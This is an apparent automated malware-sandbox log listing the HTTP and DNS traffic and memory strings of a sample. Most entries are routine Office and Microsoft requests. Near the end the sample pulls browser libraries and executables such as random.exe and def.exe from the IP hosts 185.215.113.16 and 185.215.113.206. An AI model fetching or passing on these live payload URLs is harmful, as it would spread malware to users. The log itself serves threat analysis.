Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732131581&P2=404&P3=2&P4=L7vjvpEjnBmqVX4ToTioiEAZXAu%2bQQN2X3VlXS5eXxtcVf1p7fI%2f6uw38tGYvX9eWzDLVQbJNntApuIvYItxXw%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: ZewaNzzKFoR2s/44MoXzgYSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=GE8uW+ePrTFbte8&MD=dYbVHGlU HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /bloomfilterfiles/ExpandedDomainsFilterGlobal.json HTTP/1.1Host: www.bing.comConnection: keep-aliveCookie: ANON=; MUID=25B04BE6D989657B07C35ED0D82864B0;_RwBf=;Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /img/mk.exe HTTP/1.1Host: 87.120.125.254
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Wed, 13 Nov 2024 19:21:30 GMTIf-None-Match: "6734fc3a-1b7400"
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: 000003.ldb.9.dr	String found in binary or memory: "www.youtube.com": "{: equals www.youtube.com (Youtube)
Source: 000003.ldb.9.dr	String found in binary or memory: "www.youtube.com": "{:1 equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: frogmen-smell.sbs

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com

Source: 06d4af6f50.exe, 0000001A.00000003.3717297361.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3716780298.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: file.exe, 00000000.00000002.2694732408.0000000023CB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2694732408.0000000023D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2694732408.0000000023D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeS
Source: 06d4af6f50.exe, 0000001A.00000002.3795878434.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3719067775.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3794187352.00000000003BA000.00000004.00000010.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000002.3897005303.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3804578427.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3804193606.00000000017F6000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000002.3895987276.000000000153B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3795878434.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3719067775.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000002.3897005303.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3804578427.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3804193606.00000000017F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
